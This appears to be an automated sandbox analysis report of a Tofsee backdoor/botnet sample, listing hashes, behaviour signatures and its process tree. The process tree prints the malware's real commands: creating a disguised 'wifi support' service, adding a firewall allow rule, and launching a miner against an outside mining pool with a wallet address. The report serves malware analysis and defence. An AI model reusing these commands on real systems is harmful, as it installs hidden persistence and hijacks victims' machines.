Analysis

  • max time kernel
    151s
  • max time network
    155s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    15-11-2020 22:36

General

  • Target

    ae00a627fd5f8258c7407fce21e7325475cf37605d0fafd1fa1fdd2912651dc1.exe

  • Size

    14.4MB

  • MD5

    23d4e5ec1fc789bf9012da1ee2dac488

  • SHA1

    35137488953d8baa146c0e8c739d9f6e3b81195a

  • SHA256

    ae00a627fd5f8258c7407fce21e7325475cf37605d0fafd1fa1fdd2912651dc1

  • SHA512

    396b9726a7e876cf09d9ccfacc869e77375513a7bbf9b2a7092d3ae2d394713fcbc14370f9a943c5b9496e294145aead4c9d5d2e1566ab76ca9472a6bc290e45

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ae00a627fd5f8258c7407fce21e7325475cf37605d0fafd1fa1fdd2912651dc1.exe
    "C:\Users\Admin\AppData\Local\Temp\ae00a627fd5f8258c7407fce21e7325475cf37605d0fafd1fa1fdd2912651dc1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ofijvkej\
      2⤵
        PID:3912
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ieyekmev.exe" C:\Windows\SysWOW64\ofijvkej\
        2⤵
          PID:3708
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ofijvkej binPath= "C:\Windows\SysWOW64\ofijvkej\ieyekmev.exe /d\"C:\Users\Admin\AppData\Local\Temp\ae00a627fd5f8258c7407fce21e7325475cf37605d0fafd1fa1fdd2912651dc1.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:188
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description ofijvkej "wifi internet conection"
            2⤵
              PID:1648
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start ofijvkej
              2⤵
                PID:3948
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:3092
              • C:\Windows\SysWOW64\ofijvkej\ieyekmev.exe
                C:\Windows\SysWOW64\ofijvkej\ieyekmev.exe /d"C:\Users\Admin\AppData\Local\Temp\ae00a627fd5f8258c7407fce21e7325475cf37605d0fafd1fa1fdd2912651dc1.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2220
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Modifies service
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3528
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3952

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\ieyekmev.exe

                MD5

                0a627ead2dbf96a02b6d0288a4138b24

                SHA1

                0b63423670a3d0c63476d90f18d8ac504a92ad8f

                SHA256

                d5b04bfb3d7af4edacd6dc84ce47e214f2067a122f365f05cdeb0f2fdc7aba0b

                SHA512

                5e0c032588f95304821c521bbce58bf645aaf6b94e18b874fd7f55c8ec7abc4b148638f60c49369e7d80561ecd856ea3096b79a3e986234a09af1c0257f0a8c6

              • C:\Windows\SysWOW64\ofijvkej\ieyekmev.exe

                MD5

                0a627ead2dbf96a02b6d0288a4138b24

                SHA1

                0b63423670a3d0c63476d90f18d8ac504a92ad8f

                SHA256

                d5b04bfb3d7af4edacd6dc84ce47e214f2067a122f365f05cdeb0f2fdc7aba0b

                SHA512

                5e0c032588f95304821c521bbce58bf645aaf6b94e18b874fd7f55c8ec7abc4b148638f60c49369e7d80561ecd856ea3096b79a3e986234a09af1c0257f0a8c6

              • memory/188-3-0x0000000000000000-mapping.dmp

              • memory/1648-4-0x0000000000000000-mapping.dmp

              • memory/3092-6-0x0000000000000000-mapping.dmp

              • memory/3528-8-0x0000000002A00000-0x0000000002A15000-memory.dmp

                Filesize

                84KB

              • memory/3528-12-0x0000000002BD0000-0x0000000002BD6000-memory.dmp

                Filesize

                24KB

              • memory/3528-16-0x00000000036D0000-0x00000000036D7000-memory.dmp

                Filesize

                28KB

              • memory/3528-15-0x0000000009310000-0x000000000971B000-memory.dmp

                Filesize

                4.0MB

              • memory/3528-9-0x0000000002A09A6B-mapping.dmp

              • memory/3528-10-0x0000000002A00000-0x0000000002A15000-memory.dmp

                Filesize

                84KB

              • memory/3528-11-0x0000000004840000-0x0000000004A4F000-memory.dmp

                Filesize

                2.1MB

              • memory/3528-14-0x0000000003630000-0x0000000003635000-memory.dmp

                Filesize

                20KB

              • memory/3528-13-0x0000000003620000-0x0000000003630000-memory.dmp

                Filesize

                64KB

              • memory/3708-1-0x0000000000000000-mapping.dmp

              • memory/3912-0-0x0000000000000000-mapping.dmp

              • memory/3948-5-0x0000000000000000-mapping.dmp

              • memory/3952-17-0x0000000002810000-0x0000000002901000-memory.dmp

                Filesize

                964KB

              • memory/3952-19-0x00000000028A259C-mapping.dmp